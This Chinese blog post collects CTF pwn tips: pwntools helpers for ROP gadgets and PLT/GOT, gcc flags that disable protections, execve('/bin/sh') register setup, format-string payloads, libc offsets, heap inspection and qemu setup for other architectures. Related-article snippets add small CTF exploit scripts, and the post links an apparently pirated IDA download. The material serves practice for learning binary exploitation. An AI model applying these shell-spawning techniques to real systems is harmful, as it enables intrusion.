ctf-pwn的一些小技巧

最新推荐文章于 2025-06-13 14:06:33 发布
最新推荐文章于 2025-06-13 14:06:33 发布
阅读量5.1k 收藏 9
点赞数 4
CC 4.0 BY-SA版权
分类专栏: Pwn 文章标签: pwn
钞sir
本文链接:https://blog.youkuaiyun.com/qq_40827990/article/details/83899433
本文介绍如何利用Pwntools简化ROP攻击过程,包括使用ROPgadget查找gadget,利用plt和got表进行函数调用,以及通过gdb进行调试等技巧。此外,还涉及gcc编译选项、格式化字符串攻击、libc版本查询和异构环境搭建等内容。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

当我们在写exp的时候有些需要去复制粘贴某些函数在plt表,got表的地址,或者找ROP的地址,有些时候复制粘贴不方便且不方便阅读,这样时候我们就可以用pwntools中提供的一些函数;

以32位程序的exp为例:

ROPgadget:

0x0804872f : pop ebp ; ret
0x0804872c : pop ebx ; pop esi ; pop edi ; pop ebp ; ret
0x0804843d : pop ebx ; ret
0x0804872e : pop edi ; pop ebp ; ret
0x0804872d : pop esi ; pop edi ; pop ebp ; ret
0x08048426 : ret
0x0804857e : ret 0xeac1

在exp中的0x0804843d,可以这样代替:

p32(rop.search(8).address)

其中rop:

proc = ‘文件路径’
elf = ELF(proc)
rop = ROP(elf)

找到gets函数在plt表中的位置,并将一段字符串写入bss段中:

p32(elf.plt['gets']) + 'aaaa' + p32(elf.bss()+0x100)
p.sendline("要写入的字符串")

获得gets函数在got表中的地址:

p32(elf.got['puts'])

在exp中附加gdb调试exp:

context.log_level = 'debug'

#context.terminal = ['deepin-terminal', '-x', 'sh' ,'-c']
#deepin系统要加这句
if args.G:
    gdb.attach(p)

当带G参数运行exp时(python exp.py G),就会把gdb附加进去了;

gcc编译:

NX:-z execstack / -z noexecstack (关闭 / 开启)   

Canary:-fno-stack-protector /-fstack-protector / -fstack-protector-all (关闭 / 开启 / 全开启) 

PIE:-no-pie / -pie (关闭 / 开启)   

RELRO:-z norelro / -z lazy / -z now (关闭 / 部分开启 / 完全开启) 

遇到程序当中有alarm时可以:

1. 直接vim程序,修改alarm为isnan可以patch掉alarm函数;

2. 或者sed -i s/alarm/isnan/g ./pwn1

执行int 0x80可执行对应的系统调用:

查找int 0x80:

ROPgadget --binary ./file_name --only "int 0x80"
ROPgadget --binary ./file_name --opcode cd80c3

比如对于系统调用

execve("/bin/sh",NULL,NULL)
  • 系统调用号即eax应该为0xb(32位程序)或0x3b(64位程序)
  • 第一个参数即ebx应该指向/bin/sh的地址,其实执行sh的地址也可以
  • 第二个参数即ecx应该为0
  • 第三个参数edx应该为0

64位:

  1. 64位系统调用  
  2. mov rdi,xxxx;/bin/sh字符串的地址  
  3. mov rax,59;execve的系统调用号  
  4. mov rsi,0;  
  5. mov rdx,0 
  6.  syscall  

linux x64的传参方式:
它不同于x86的栈传参,它是优先6个寄存器传参,依次是RDI,RSI,RDX,RCX,R8,R9,然后多余的参数才传进栈内,所以在进行ROP,找gadget的时候注意先从rdi开始传参数,然后再是RSI,RDX,RCX,R8,R9,最后才是栈上面的;

int 80和syscenter采用的同样的传参顺序:eax,ebx,ecx,edx

但是syscall的传参顺序变成了rdi,rsi,rdx,r10,r9,r8

p.shutdown('send'):用于关闭读写通道,相当于Ctrl+c结束while循环;

知道libc.so找函数的偏移的方法:

libc = ELF('./libc.so')

system_offset = libc.symbols['system']

binsh_offset = next(libc.search('/bin/sh'))

recvuntil('?') : 直到看到' ?'后才进行操作;

格式化字符串常用函数 fmtstr_payload:

格式:

fmtstr_payload(num,{x_addr:str_addr})

num相当于%n$x中的n,表示第几个数,x_addr表示要修改的值的地址,str_addr表示需要修改成的值;

替换libc.so:

export LD_PRELOAD="/usr/lib/x86_64-linux-gnu/libproxychains.so.4"

 

gdb查看堆的快表:

p/x main_arena.fastbinsY

堆的其他查看:

p *(mchunkprt) 0x602010

find_fake_fast

exit退出的函数通过修改<_rtld_global+3848>位置可以修改rip; 先找_dl_fini的地址可以找到_rtld_global,它一个结构体;

one_gadget 通过realloc_hook(one)和__malloc_hook(__GI___libc_realloc+n)来调整;

在线查libc版本:

https://libc.blukat.me/

IDA下载:

http://fuckilfakp5d6a5t.onion.pet/

pwn异构环境搭建:

1.安装 qemu:

sudo apt-get install qemu-user

通过qemu模拟arm/mips环境,进而用gdb-multiarch进行调试;

2.安装gdb-multiarch:

sudo apt-get install gdb-multiarch

3.安装共享库:

根据需要安装,查看有那些库;

以mips为例:

apt-cache search "libc6" | grep mips

然后运行apt install +库名就可以安装;

4.运行方法:

静态链接的binary直接运行即可,会自动调用对应架构的qemu;

动态链接的bianry需要用对应的qemu同时指定共享库路径,使用-L指定共享库;

例如运行add文件:

qemu-mipsel -L /usr/mipsel-linux-gnu/ ./add

用file命令查看文件信息,然后根据文件的类型选择qemu-的类型;

qemu-的类型:

sir@sir-PC:~/desktop$ qemu-
qemu-aarch64       qemu-i386          qemu-mipsel        qemu-ppc64abi32    qemu-sparc
qemu-aarch64_be    qemu-m68k          qemu-mipsn32       qemu-ppc64le       qemu-sparc32plus
qemu-alpha         qemu-microblaze    qemu-mipsn32el     qemu-riscv32       qemu-sparc64
qemu-arm           qemu-microblazeel  qemu-nios2         qemu-riscv64       qemu-tilegx
qemu-armeb         qemu-mips          qemu-or1k          qemu-s390x         qemu-x86_64
qemu-cris          qemu-mips64        qemu-ppc           qemu-sh4           qemu-xtensa
qemu-hppa          qemu-mips64el      qemu-ppc64         qemu-sh4eb         qemu-xtensaeb

5.调试方法:

可以使用qemu的-g指定端口:

qemu-mipsel -g 1234 -L /usr/mipsel-linux-gnu/ ./add

然后启动gdb-multiarch进行调试,先指定架构,再使用remote功能指定端口:

pwndbg> set architecture mips
pwndbg> target remote localhost:1234

 

CTFshow-PWN-栈溢出(pwn62-pwn64)
Welcome To Myon'Blog !
07-10 401
本文分享了三个PWN题解法:1) pwn62利用24字节shellcode绕过保护;2) pwn63优化至23字节shellcode;3) pwn64在32位程序中直接执行写入的shellcode。每个解法都通过精心构造的payload成功获取flag,展示了不同场景下的漏洞利用技巧。文中包含完整的Python利用代码和获取的flag值。
跟着CTF-Wiki学pwn|格式化字符串(1)
Kni9hT's Blog
05-19 2383
文章目录格式化字符串漏洞原理介绍格式化字符串函数介绍格式化字符串函数格式化字符串参数格式化字符串漏洞原理格式化字符串漏洞利用程序崩溃泄露内存泄露栈内存获取栈变量数值获取栈变量对应字符串泄露任意地址内存覆盖内存覆盖栈内存确定覆盖地址确定相对偏移进行覆盖覆盖任意地址内存覆盖小数字覆盖大数字 格式化字符串漏洞原理介绍 首先,对格式化字符串漏洞的原理进行简单介绍。 格式化字符串函数介绍 格式化字符串函数可以接受可变数量的参数,并将第一个参数作为格式化字符串,根据其来解析之后的参数。通俗来说,格式化字符串函数就是将计
Linux pwn入门教程(3)——ROP技术
xiaoi123的博客
07-10 7773
作者:Tangerine@SAINTSEC原文来自:https://bbs.ichunqiu.com/thread-42530-1-1.html0×00 背景在上一篇教程的《shellcode的变形》一节中,我们提到过内存页的RWX三种属性。显然,如果某一页内存没有可写(W)属性,我们就无法向里面写入代码,如果没有可执行(X)属性,写入到内存页中的shellcode就无法执行。关于这个特性的实验在...
PWN基础知识总结
丰年留客的专栏
03-29 1729
0x00 Intro 这里记录一些在CTF PWN类题目经常要考虑的技术点,是一些与C/ASM相关,比较底层的东西。总结来说有: C和汇编之间的参数传递 栈的细节 64位程序参数传递 只有对这些细节都清楚了,那么利用时,如何构造Payload就没有想象中那么困难了。这里目前还是只限于x86-64架构。 0x01 C和汇编之间的参数传递 有编译器基础的都知道,GCC将C语言编译为机器语言中间有几个过程。 预处理(将宏展开) 汇编(将C代码转为汇编代码) 编译(将汇编转为机器码) 链接(将静态库,多个源文
CTF选手必藏的100个实战解题思路,(非常详细)从零基础到精通,收藏这篇就够了!
最新发布
Python_0011的博客
06-13 949
CTF比赛,那可是网络安全圈的华山论剑。想在里面混出名堂?光有理论知识可不行,得有实战经验,还得会各种骚操作。今天,我就把多年来在CTF赛场上摸爬滚打总结出的100个解题思路分享出来,别说我没提醒你,能看懂一半,绝对是高手中的高手!
buuctf pwn 部分exp(无解析,持续更新)
orange_cat__的博客
11-17 355
【代码】buuctf pwn 部分exp(无解析,持续更新)
CTF PWN-攻防世界XCTF新手区WriteUp
道阻且长,行则将至
10-20 1万+
文章目录前言001 get_shell002 hello_pwn 前言 PWN 是一个黑客语法的俚语词 ,是指攻破设备或者系统 。发音类似“砰”,对黑客而言,这就是成功实施黑客攻击的声音——砰的一声,被“黑”的电脑或手机就被你操纵。以上是从百度百科上面抄的简介,而我个人理解的话,应该就是向目标发送特定的数据,使得其执行本来不会执行的代码,前段时间爆发的永恒之蓝等病毒其实也算得上是 pwn 的一种。 CTFPWN 类型的题目的目标是拿到 flag,一般是在 linux 平台下通过二进制/系统调用等方式编
[CTF PWN] 从0到0.00001 PWN入门超级详细
热门推荐
Csome
06-06 2万+
超级详细的CTFPwn方向的介绍,非常适合小白萌新,真的超级超级详细。Pwn的简介 Pwn的理论工具准备 初学 工具 贮备知识 入门 工具 贮备知识 Pwn的学习 初学-从Writeup中学习 入门-从比赛中学习 Pwn的环境准备 Windows 在Vscode中配置Pwn中环境 在Vscode中Pwn Pwntools的学习 简易快速入门 Pwn的做题流程 Pwn的简单例子 checksec 分析函数及漏洞 main函数 fun函数 编写exp 编写Writeup 小结
2018第四届百越杯CTF总结-pwn(附带python调用gdb小技巧
qq_35661990的博客
12-20 1826
这次做了一题逆向和pwn,不过做出的逆向太简单了就不多说了,倒是借着两题最基础的pwn题好好学习了一下ret2lib和ret2plt,以及格式化字符串漏洞。只是写payload的话,照着ctf wiki上的改几个地址就可以了。 Boring game 考察基础的ret2libc和ret2plt,在google上找到一篇把ret2libc基础讲得很好的文章 https://www.shellb...
搭建Ubuntu CTF-pwn环境
qq_34317874的博客
06-21 315
搭建Ubuntu CTF-pwn环境
CTF-浅尝64位栈溢出PWN
BadRer的博客
06-04 1万+
干了一早上终于把这道’难题’做出来了,实在是不容易。头一次完完全全的做出64位的pwn题,如果就栈溢出来说的话,其实感觉和32位的也差不多。至少这方面没有遇到太大的困难,做64位的题对汇编指令的要求就更高了。正好一边做题,一边多学点汇编。 收获是很大的。正文刚开始被一个逻辑漏洞cmp给卡着,一直没有跳到真正产生漏洞的地方,好不容易跳过去了,结果被我自己坑了(写脚本的时候,没有考虑缓冲区的影响,经常
BUUCTF pwn题exp整合
菜的只能随便写写博客
02-29 730
0x01 rip from pwn import* p = remote('node3.buuoj.cn',27511) payload = 'a'*23+p64(0x401198)+p64(0x401186) p.sendline(payload) p.interactive()   0x02 warmup_csaw_2016 from pwn import * #p = proces...
ciscn2021CTF国赛pwn
qq_39948058的博客
08-27 1508
CTF2021-05-18 总结:这次pwn的比赛难易程度尚可,菜菜的我在各位师傅的领导下勉勉强强做出了3道pwn,这三道pwn都不算太难,一道越界,越界pwny这道题确实把我搞吐了,后期卡在了ret的与数组的偏移,这个不会计算,在th1un师傅的领导下,才知道了如何计算,勉强做出来了,值得说的是数组越界在2021年比赛中出现的越来越频繁了,是真的频繁了,第二道pwn是一个堆,只不过index受到了限制,既然index受到了限制并不影响我们在同一个index构造多个chunk,所以这个题也是常规操作.
CTF(pwn)攻防世界warmup
半岛铁盒的博客
03-06 1048
题目描述 这种题很有意思,只给了题目场景地址没有文件,让你盲打,类似于web中的盲注吧; nc连接,给了 目标地址, 思路是:利用栈溢出覆盖,返回这个地址; 具体是溢出多少是不确定的,是P64(),还是 P32() 也是不确定的; 写个EXP逐渐试一下 from pwn import * a = 0x40060d for i in range(10,100): p = remote('111.200.241.244',49684) payload='a'*i+p64(a) p.recvun
CTF(pwn)-格式化字符串漏洞讲解()
半岛铁盒的博客
02-25 952
一、基本介绍 格式化字符串漏洞在通用漏洞类型库CWE中的编号是134,其解释为“软件使用了格式化字符串作为参数,且该格式化字符串来自外部输入”。会触发该漏洞的函数很有限,主要就是printf、sprintf、fprintf等print家族函数。 printf()函数的一般形式为printf(“格式化字符串”,参数…),其第一个参数就是格式化字符串,用来告诉程序以什么格式进行输出。 它的参数是由格式化说明符与字符串组成的,通过格式化说明符来规定参数用什么格式输出内容。 格式化说明符有这些: %d - 十进制
CTF pwn 方向部分题解
kali_Ma的博客
01-12 1459
dataleak 用”\或者/都可以跳过2个\x00,但是每次用”\会拷贝4个字节到buf中,导致最后的3字节数据无法泄露,所以用/\配合垃圾数据填充来控制泄露字符串。 exp: #!python #coding:utf-8 from pwn import * import subprocess, sys, os from time import sleep sa = lambda x, y: p.sendafter(x, y) sla = lambda x, y: p.sendlineafter(x
PWN视角看待C函数——scanf
CoLin的pwn小屋
11-13 4239
scanf函数测试所用版本测试内容参数%d参数%u、%lld、%llu、%x、%llx、%f、%llf参数%c参数%s scanf函数是标准输入函数的一种,它的一些特性可以作为一些PWN题的利用空间。本文档记录对scanf函数的实验与分析的过程与结果。 scanf测试的重点是格式化的字符串。对于后面的参数来说,如果可以在之前修改对应于字符串的指针参数,那么可以实现任意地址写,这个不是scanf本身的特性,不做分析。 测试所用版本 gcc版本:gcc (Debian 10.3.0-12) 10.3.0,编译
PWN-scanf函数的格式化字符串漏洞利用
T_aXin的博客
07-08 2507
栈帧销毁时栈上的数据并不会被清除,只是改变了寄存器rbp和rsp的位置而已,所以栈上还保留了之前printf函数执行时产生的canary,可以通过抬栈的方式将变量v1指向之前产生的canary,然后利用scanf的格式化字符串漏洞和printf函数泄露canary即可。(\x20相当于回车)此时rax与rdi指向的就是变量v1在栈上的分布,其内容就是canary,然后输入字符或字符串使程序识别不到双精度浮点数,所以不会对栈上的数据进行覆盖,然后再用printf函数就可以输出canary的内容了。
pwn做题笔记14-echo_back(printf函数栈详细利用+利用控制scanfIO流实现任意地址写入)
qq_40923256的博客
08-28 616
当Linux新建一个进程时,会自动创建3个文件描述符0、1和2,分别对应标准输入、标准输出和错误输出。C库中创建与文件描述符对应的是文件指针scanf读取stdin时依照读文件的方法,内部调用_IO_new_file_underflow函数。而该函数最终调用了_IO_SYSREAD系统调用来读取文件。在调用系统函数前,该函数同时进行了判断处理:根据读取指针的位置和结束位置来判断缓冲区中是否还有可读取的数据。
CTFSHOW-PWN入门 pwn5
01-10
### CTF SHOW PWN入门 pwn5 解法 对于CTF SHOW平台上的PWN挑战,尤其是针对`pwn5`这一题目,解决方法通常涉及对二进制漏洞的理解以及如何利用这些漏洞来获取flag。 #### 题目分析 在处理这类问题时,首先需要下载...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值